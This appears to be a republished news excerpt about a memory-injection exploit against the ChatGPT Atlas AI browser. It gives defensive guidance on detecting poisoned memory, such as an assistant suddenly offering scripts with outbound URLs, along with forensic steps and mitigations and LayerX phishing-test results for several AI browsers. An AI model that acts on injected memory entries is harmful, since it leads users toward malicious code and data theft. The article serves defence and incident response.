How to detect a hit: Detecting a memory-based compromise in ChatGPT Atlas is not like hunting for traditional malware. There are no files, registry keys, or executables to isolate. Instead, security teams need to look for behavioral anomalies such as subtle shifts in how the assistant responds, what it suggests, and when it does so.”There are clues, but they sit outside the usual stack. For example, an assistant that suddenly starts offering scripts with outbound URLs, or one that begins anticipating user intent too accurately, may be relying on injected memory entries. When memory is compromised, the AI can act with unearned context. That should be a red flag,” said Sanchit Vir Gogia, CEO and chief analyst at Greyhound Research.He added, from a forensic perspective, analysts need to pivot toward correlating browser logs, memory change timestamps, and prompt-response sequences. Exporting and parsing chat history is essential. SOC teams should pay close attention to sequences where users clicked on unknown links followed by unusual memory updates or AI-driven agent actions.As this is not a plug-and-play detection problem, redemption and mitigation start with keeping Atlas disabled for the enterprise by default. In Business, it should be confined to tightly scoped pilots with non”‘sensitive data. Jaju added that for monitoring, enterprises should add detections for AI”‘suggested code, fetching remote payloads, unusual egress after ChatGPT usage, and session”‘riding behaviors in SaaS. He also suggested enabling web filtering on newly registered or uncategorized domains.The moment an Atlas user’s memory is compromised, the threat resides in the cloud-bound identity, not in any one machine. That is why the response must start with the account. Memory must be cleared. Credentials should be rotated. All recent chat history should be reviewed for signs of tampering, hidden logic, or manipulated task flow, noted Gogia.
Are AI browsers safe?: Along with identifying the vulnerability, LayerX claimed that ChatGPT Atlas is also not equipped to stop phishing attacks. In the tests conducted by the company, ChatGPT Atlas had a failure rate of over 94%. Of the total 103 in-the-wild attacks, 97 attacks went through successfully.The results were not very promising for other AI browsers, which the company tested last month. Perplexity’s Comet and Genspark were only able to stopped only 7% phishing attacks, while only Arc browser’s Dia was able to stop around 46% attacks. The traditional browsers, such as Edge and Chrome, on the other hand, are relatively well equipped and were able to stop about 50% of phishing attacks using their out-of-the-box protections.
First seen on csoonline.com
Jump to article: www.csoonline.com/article/4080144/atlas-browser-exploit-lets-attackers-hijack-chatgpt-memory.html
